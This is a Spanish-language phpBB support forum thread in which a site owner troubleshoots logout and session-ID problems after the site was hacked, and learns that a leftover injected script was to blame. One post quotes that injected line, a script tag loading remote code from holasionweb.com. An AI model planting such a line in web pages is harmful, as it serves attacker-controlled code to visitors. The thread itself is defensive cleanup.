Recordad que para pedir soporte alguno, debéis facilitar los datos de soporte oportunos por favor, mirad aquí y leer las Normas generales del foro, esto nos servirá de ayuda para dar el mejor soporte..

Gracias.

La Administración de phpBB España.

web es atacada o que es esto?

Foros donde podréis dejar vuestras dudas sobre phpBB 3.0.x

0
No hay votos
 
Votos totales: 0

Dolls
Observador/a
Mensajes: 32
Registrado: 23 Oct 2007, 06:04

Re: web es atacada o que es esto?

#16

Mensaje por Dolls »

bueno que va sigue sin funcionar

mi problema es que cuando voy a entara a la web aparesco como deslogueado no recuerda los logins si ago click en algun tema desde los ultimos post de mi web se desloguea pero si ago click desde algun link de las noticias no se desloguea si salgo de la pagina y vuelvoa entrar entro como deslogueado aparte antes no me salia esto en las url ejemplo antes aparecia la url asi

wwww.evlucionone.com/index.php

ahora despues del index aparece esto &sid=58733cc6af53a0ca8f03f2e

cosa que no aparecia antes he visto que se puede quitar pero no encuentro la manera de quitar lo unico que encuentro es esto que se llama phpbb_seo que hace la url amigables que se encuentra en esta web el cual cuando voya instalar me pide que me loguea me logueo despues le doy click a la pestaña instalar y nuevamente me pide que me loguee y en eso se pasa y no he podido arreglar nada

Avatar de Usuario
HuanManwe
Ex Staff
Mensajes: 5078
Registrado: 20 Jun 2006, 18:21
Género:
Edad: 50

Re: web es atacada o que es esto?

#17

Mensaje por HuanManwe »

¿Has probado a entrar desde otro navegador? ¿O limpiar las cookies de tu navegador habitual?

Der Mensch schuf Gott nach seinem eigenen Bild

Berlín siempre estará en mi corazón. Auf wiedersehen, Berlin!!


Dolls
Observador/a
Mensajes: 32
Registrado: 23 Oct 2007, 06:04

Re: web es atacada o que es esto?

#18

Mensaje por Dolls »

HuanManwe escribió:¿Has probado a entrar desde otro navegador? ¿O limpiar las cookies de tu navegador habitual?
si ya lo probe y nada tambien le he preguntado a los user para ver si solo soy yo y a todo el mundo le pasa lo mismo

Avatar de Usuario
HuanManwe
Ex Staff
Mensajes: 5078
Registrado: 20 Jun 2006, 18:21
Género:
Edad: 50

Re: web es atacada o que es esto?

#19

Mensaje por HuanManwe »

o es que algo falló en la limpieza de los archivos o es que algo falla en el servidor mismo. No se me ocurren más posibilidades.

Der Mensch schuf Gott nach seinem eigenen Bild

Berlín siempre estará en mi corazón. Auf wiedersehen, Berlin!!


Dolls
Observador/a
Mensajes: 32
Registrado: 23 Oct 2007, 06:04

Re: web es atacada o que es esto?

#20

Mensaje por Dolls »

HuanManwe escribió:o es que algo falló en la limpieza de los archivos o es que algo falla en el servidor mismo. No se me ocurren más posibilidades.
bueno yo acabo de mandar un mensaje a los del hosting para ver que me contestan despues pongo a ver que pasa


a una ultima pregunta ahy alguna forma de quitar eso del &sid=13451027340 despues de la url

Avatar de Usuario
HuanManwe
Ex Staff
Mensajes: 5078
Registrado: 20 Jun 2006, 18:21
Género:
Edad: 50

Re: web es atacada o que es esto?

#21

Mensaje por HuanManwe »

que yo sepa no, o no es buena idea, porque eso le dice a todas las páginas que el que visitas eres tú, que ya te has identificado contra el servidor, y eres "tú". Por eso parecía un error de cookies, lo que te pasa. Por eso te dijimos que limpiaras la caché del foro y del navegador y que comprobaras la configuración de las cookies.

Me voy a la cama :-)

Der Mensch schuf Gott nach seinem eigenen Bild

Berlín siempre estará en mi corazón. Auf wiedersehen, Berlin!!


Dolls
Observador/a
Mensajes: 32
Registrado: 23 Oct 2007, 06:04

Re: web es atacada o que es esto?

#22

Mensaje por Dolls »

HuanManwe escribió:que yo sepa no, o no es buena idea, porque eso le dice a todas las páginas que el que visitas eres tú, que ya te has identificado contra el servidor, y eres "tú". Por eso parecía un error de cookies, lo que te pasa. Por eso te dijimos que limpiaras la caché del foro y del navegador y que comprobaras la configuración de las cookies.

Me voy a la cama :-)
bueno mira que resolvi despues de mi web ser atacada se limpio todo y quedo algo que este script

<script src="http://holasionweb.com/oo.php"></script>

el cual si vas a la paggina que pone veras un codigo que sabes que es lo que hace eso solucina el problema

esto servira para los que han sido atacados

Avatar de Usuario
HuanManwe
Ex Staff
Mensajes: 5078
Registrado: 20 Jun 2006, 18:21
Género:
Edad: 50

Re: web es atacada o que es esto?

#23

Mensaje por HuanManwe »

no he entenido nada de lo que has dicho :roll:

Der Mensch schuf Gott nach seinem eigenen Bild

Berlín siempre estará en mi corazón. Auf wiedersehen, Berlin!!


Dolls
Observador/a
Mensajes: 32
Registrado: 23 Oct 2007, 06:04

Re: web es atacada o que es esto?

#24

Mensaje por Dolls »

HuanManwe escribió:no he entenido nada de lo que has dicho :roll:
bueno te explico parece que despues de la limpieza quedo una parte del codigo el script que puse arriba que hace referencia a esta pagina
http://holasionweb.com/oo.php al momento de cargar el script lo que hace es cambiar la cokkie y por se deslogueaba

Avatar de Usuario
HuanManwe
Ex Staff
Mensajes: 5078
Registrado: 20 Jun 2006, 18:21
Género:
Edad: 50

Re: web es atacada o que es esto?

#25

Mensaje por HuanManwe »

vale, que te faltó uno por limpiar. Bueno, espero que esté todo bien ahora.

Por cierto, yo de tí cambiaría la contraseña del usuario ftp, porque no sabes si los hackers han conseguido ese dato.

Der Mensch schuf Gott nach seinem eigenen Bild

Berlín siempre estará en mi corazón. Auf wiedersehen, Berlin!!


Dolls
Observador/a
Mensajes: 32
Registrado: 23 Oct 2007, 06:04

Re: web es atacada o que es esto?

#26

Mensaje por Dolls »

HuanManwe escribió:vale, que te faltó uno por limpiar. Bueno, espero que esté todo bien ahora.

Por cierto, yo de tí cambiaría la contraseña del usuario ftp, porque no sabes si los hackers han conseguido ese dato.

si ya la cambie

Cerrado

Volver a “Foros de Soporte 3.0.x”